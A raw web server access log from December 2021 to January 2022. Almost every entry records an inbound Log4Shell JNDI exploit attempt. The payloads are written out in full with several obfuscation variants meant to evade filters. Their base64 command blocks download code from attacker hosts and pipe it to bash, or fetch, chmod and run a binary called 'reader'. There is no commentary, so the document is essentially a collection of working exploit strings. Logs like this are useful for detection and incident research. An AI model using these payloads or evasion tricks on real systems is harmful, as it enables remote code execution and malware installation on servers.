195.54.160.149 - - [26/Dec/2021:09:43:05 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
195.54.160.149 - - [26/Dec/2021:19:30:20 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [26/Dec/2021:19:30:21 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [27/Dec/2021:07:00:43 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
195.54.160.149 - - [27/Dec/2021:16:36:07 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
164.90.239.160 - - [27/Dec/2021:19:47:59 +0000] "GET / HTTP/1.1" 302 203 "${jndi:dns://50-116-41-48.scanworld.net/ref}" "${jndi:dns://50-116-41-48.scanworld.net/ua}"
195.54.160.149 - - [28/Dec/2021:03:47:35 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
195.54.160.149 - - [28/Dec/2021:13:21:14 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [28/Dec/2021:13:21:14 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
107.77.225.225 - - [28/Dec/2021:16:39:23 +0000] "GET /?dfeea=${jndi:ldap://50.116.41.48.c75kh6c2vtc0000amee0gd13aueyyyyyb.interact.sh/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.225.225 - - [28/Dec/2021:16:39:23 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c75kh6c2vtc0000amee0gd13aueyyyyyb.interact.sh/a}"
166.137.252.110 - - [28/Dec/2021:16:56:07 +0000] "GET /?tyesb=${jndi:ldap://50.116.41.48.c75kh6c2vtc0000amee0gd13aueyyyyyb.interact.sh/a} HTTP/1.1" 302 289 "-" "curl/7.64.0"
166.137.252.110 - - [28/Dec/2021:16:56:07 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c75kh6c2vtc0000amee0gd13aueyyyyyb.interact.sh/a}"
107.77.225.225 - - [28/Dec/2021:20:16:01 +0000] "GET /?kirvp=${jndi:ldap://50.116.41.48.c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.225.225 - - [28/Dec/2021:20:16:02 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a}"
166.137.252.110 - - [28/Dec/2021:20:38:28 +0000] "GET /?ayjpo=${jndi:ldap://50.116.41.48.c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a} HTTP/1.1" 302 289 "-" "curl/7.64.0"
166.137.252.110 - - [28/Dec/2021:20:38:28 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a}"
195.54.160.149 - - [29/Dec/2021:00:14:14 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
195.54.160.149 - - [29/Dec/2021:09:55:27 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [29/Dec/2021:09:55:27 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
185.220.101.23 - - [29/Dec/2021:13:04:21 +0000] "GET /?harvj=${jndi:ldap://50.116.41.48.c752sa3k9oeb2eg2ehpgc8fnhkeyyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
185.220.101.23 - - [29/Dec/2021:13:04:23 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c752sa3k9oeb2eg2ehpgc8fnhkeyyyyyn.domsearch.net/a}"
107.77.223.226 - - [29/Dec/2021:17:11:10 +0000] "GET /?pqevk=${jndi:ldap://50.116.41.48.c769awk2vtc00005kyk0gduriqcyyyyyb.interact.sh/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.223.226 - - [29/Dec/2021:17:11:10 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c769awk2vtc00005kyk0gduriqcyyyyyb.interact.sh/a}"
107.77.70.124 - - [29/Dec/2021:17:30:34 +0000] "GET /?ydgte=${jndi:ldap://50.116.41.48.c769awk2vtc00005kyk0gduriqcyyyyyb.interact.sh/a} HTTP/1.1" 302 289 "-" "curl/7.64.0"
107.77.70.124 - - [29/Dec/2021:17:30:34 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c769awk2vtc00005kyk0gduriqcyyyyyb.interact.sh/a}"
195.54.160.149 - - [29/Dec/2021:21:32:51 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
207.244.248.240 - - [29/Dec/2021:22:56:11 +0000] "GET / HTTP/1.1" 302 203 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMi41OC4xNDkuMjA2L3JlYWRlcjsgY3VybCAtTyBodHRwOi8vMi41OC4xNDkuMjA2L3JlYWRlcjsgY2htb2QgNzc3IHJlYWRlcjsgLi9yZWFkZXIgcnVubmVy}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMi41OC4xNDkuMjA2L3JlYWRlcjsgY3VybCAtTyBodHRwOi8vMi41OC4xNDkuMjA2L3JlYWRlcjsgY2htb2QgNzc3IHJlYWRlcjsgLi9yZWFkZXIgcnVubmVy}')"
207.244.248.240 - - [29/Dec/2021:22:56:12 +0000] "GET / HTTP/1.1" 200 5382 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMi41OC4xNDkuMjA2L3JlYWRlcjsgY3VybCAtTyBodHRwOi8vMi41OC4xNDkuMjA2L3JlYWRlcjsgY2htb2QgNzc3IHJlYWRlcjsgLi9yZWFkZXIgcnVubmVy}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMi41OC4xNDkuMjA2L3JlYWRlcjsgY3VybCAtTyBodHRwOi8vMi41OC4xNDkuMjA2L3JlYWRlcjsgY2htb2QgNzc3IHJlYWRlcjsgLi9yZWFkZXIgcnVubmVy}')"
195.54.160.149 - - [30/Dec/2021:07:05:12 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
167.71.13.196 - - [30/Dec/2021:08:28:27 +0000] "GET /$%7Bjndi:ldap://167.71.13.196:443/lx-ffff32742930bb01006a6dcd6100000000060d1c%7D?${jndi:ldap://167.71.13.196:443/lx-ffff32742930bb01016a6dcd6100000000342e6e}=${jndi:ldap://167.71.13.196:443/lx-ffff32742930bb01026a6dcd61000000004b1272} HTTP/1.1" 400 347 "-" "${jndi:ldap://167.71.13.196:443/lx-ffff32742930bb01086a6dcd6100000000da51b8}"
162.241.114.189 - - [30/Dec/2021:15:41:21 +0000] "HEAD /?id=${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w} HTTP/1.1" 200 - "-" "${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w/bcable.net/?id=${jndi:ldap}"
162.241.114.189 - - [30/Dec/2021:15:41:21 +0000] "GET /?id=${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w} HTTP/1.1" 200 5382 "-" "${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w/bcable.net/?id=${jndi:ldap}"
162.241.114.189 - - [30/Dec/2021:15:41:21 +0000] "HEAD /?id=${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w} HTTP/1.1" 302 - "-" "${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w/www.bcable.net/?id=${jndi:ldap}"
162.241.114.189 - - [30/Dec/2021:15:41:21 +0000] "HEAD /?id=${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w} HTTP/1.1" 301 - "-" "${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w/bcable.net/?id=${jndi:ldap}"
162.241.114.189 - - [30/Dec/2021:15:41:21 +0000] "HEAD /?id=${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w} HTTP/1.1" 302 - "-" "${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w/www.bcable.net/?id=${jndi:ldap}"
195.54.160.149 - - [30/Dec/2021:18:10:50 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
195.54.160.149 - - [31/Dec/2021:03:46:47 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [31/Dec/2021:14:42:28 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
199.127.60.104 - - [31/Dec/2021:20:35:29 +0000] "GET / HTTP/1.1" 302 203 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMi41OC4xNDkuMjA2L3JlYWRlcjsgY3VybCAtTyBodHRwOi8vMi41OC4xNDkuMjA2L3JlYWRlcjsgY2htb2QgNzc3IHJlYWRlcjsgLi9yZWFkZXIgcnVubmVy}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMi41OC4xNDkuMjA2L3JlYWRlcjsgY3VybCAtTyBodHRwOi8vMi41OC4xNDkuMjA2L3JlYWRlcjsgY2htb2QgNzc3IHJlYWRlcjsgLi9yZWFkZXIgcnVubmVy}')"
195.54.160.149 - - [31/Dec/2021:23:58:35 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [01/Jan/2022:11:21:52 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" 